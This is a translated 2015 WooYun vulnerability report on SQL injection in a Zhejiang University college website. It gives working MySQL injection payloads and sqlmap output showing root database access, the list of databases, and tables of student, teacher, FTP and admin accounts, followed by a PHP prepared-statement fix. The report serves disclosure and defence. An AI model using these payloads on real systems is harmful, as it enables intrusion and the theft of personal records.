
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0154890

Title: SQL injection in the Zhejiang University School of Management; databases of several related colleges compromised with root privileges

Vendor: Zhejiang University

Author: 40huo

Submitted: 2015-11-26 22:25

Fix time: 2015-12-01 22:26

Disclosed: 2015-12-01 22:26

Type: SQL injection

Severity: High

Self-assessed rank: 10

Status: Handed over to a third-party partner organisation (CCERT, the CERNET emergency response group) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-26: Details sent to the vendor; awaiting vendor handling
2015-12-01: Vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

POST-parameter injection
Multiple databases compromised

Details:

Injection point:
http://**.**.**.**/e/enews/index.php
Injection types:

---
Parameter: name (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=


---
[17:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
---


Root privileges:

web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[23:12:08] [INFO] fetching current user
[23:12:08] [INFO] resumed: root@localhost
current user: 'root@localhost'

Proof of vulnerability:

Databases of several colleges are affected:

sqlmap identified the following injection point(s) with a total of 1136 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [14]:
[*] ftp
[*] information_schema
[*] mysql
[*] test
[*] usr_zjuemba
[*] zheda
[*] zju_cma
[*] zju_emba
[*] zju_gep
[*] zju_gmc
[*] zju_jcie
[*] zju_niim
[*] zju_som
[*] zju_vote


FTP account credentials for all sites are exposed:

Database: ftp
Table: users
[10 entries]


Thousands of student and teacher records are exposed (including names, student IDs, class, major, home address, résumé, etc.):

+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| student_login_log | 118955 |
| teacher_login_log | 32051 |
| article | 23158 |
| admin_log | 19863 |
| article20110418 | 16533 |
| cma_news | 13284 |
| admin_login_log | 10417 |
| meeting | 7291 |
| student | 3495 |  (student information table)
| student20120306 | 2797 |
| student20110919 | 2470 |
| student20110909 | 2314 |
| student20110331 | 2089 |
| article_baoming | 1538 |
| zt_xly2011_baoming | 1161 |
| zt_xly2013_baoming | 980 |
| zt_xly2010_baoming | 849 |
| zt_xly2014_baoming | 822 |
| zt_xly2012_baoming | 632 |
| student20121022 | 446 |
| zt_yx2011_baoming | 396 |
| teacher | 311 |  (teacher information table)
| article_cate | 169 |
| base_info | 88 |
| friends | 57 |
| dept | 49 |
| upload_files | 43 |
| admin_user | 38 |
| zt_cate | 22 |
| zt_yx2011_jiabin | 15 |
| base_cate | 9 |
| room | 9 |
| en_index_pic | 7 |
| friend_cate | 6 |
| zt_huodong | 6 |
| gundong | 5 |
| peiyang | 4 |
| photo | 4 |
| teacher_bak | 4 |
| article_wcate | 3 |
| faqs | 3 |
| qa_cate | 3 |
| class | 2 |
| zhuanye | 2 |
| zt_info | 2 |
| sitemap | 1 |
+--------------------+---------+


Backend administrator account credentials are exposed:

Database: zju_som
Table: admin_user
[38 entries]


The admin backend is accessible.
Afraid of getting expelled, so I'm not going any further; leaving it at that.

Fix:

Filter input.
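The fix section above says only "filter". As an added example (not code from the report, the affected site, or its CMS), here is the query shape the report describes, a user-controlled name spliced into a LIKE '%...%' pattern, next to the same lookup done with a prepared statement; the table and column names (feedback, name, events_id) are assumptions. Keyword filtering is fragile and easy to get wrong, whereas a bound parameter keeps the query structure independent of the input.

```php
<?php
// Added example, not code from the affected site or its CMS.
// Mirrors the request in the report: POST enews=AddFeedback with a
// user-controlled "name" field that ends up inside a LIKE '%...%' pattern.
// Table/column names (feedback, name, events_id) are assumptions.

function vulnerable_feedback_count(mysqli $db, string $name, int $eventsId): int
{
    // Vulnerable shape: the value is spliced straight into the quoted pattern,
    // so an input beginning "1%'" closes the quote and appends SQL (the report's
    // payloads end with "AND '%'='" so the original closing "%'" still parses).
    $sql = "SELECT COUNT(*) FROM feedback WHERE events_id = $eventsId"
         . " AND name LIKE '%" . $name . "%'";
    return (int) $db->query($sql)->fetch_row()[0];
}

function safe_feedback_count(mysqli $db, string $name, int $eventsId): int
{
    // Hardened form: the query text is fixed and the value travels as a bound
    // parameter, so quotes, % and SQL keywords in $name are just characters.
    $stmt = $db->prepare(
        "SELECT COUNT(*) FROM feedback WHERE events_id = ? AND name LIKE ?"
    );
    // Escape LIKE metacharacters too, so input cannot widen the match.
    $pattern = '%' . addcslashes($name, '%_\\') . '%';
    $stmt->bind_param('is', $eventsId, $pattern);
    $stmt->execute();
    $stmt->bind_result($count);
    $stmt->fetch();
    $stmt->close();
    return (int) $count;
}

// The report shows the application connecting as root@localhost, which is why
// one injection exposed all 14 databases. A per-application account limited to
// its own schema (assumed names below) bounds the damage of any future bug.
// GRANT SELECT, INSERT ON zju_som.* TO 'som_web'@'localhost';
```

The prepared statement is the fix; the least-privilege grant is a separate hardening step that limits how far a repeat of this bug could reach.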

Copyright notice: when reposting, credit the source: 40huo@WooYun


Vulnerability response

Vendor response:

Severity: No impact (ignored by vendor)

Ignored at: 2015-12-01 22:26

Vendor reply:

Latest status:

None yet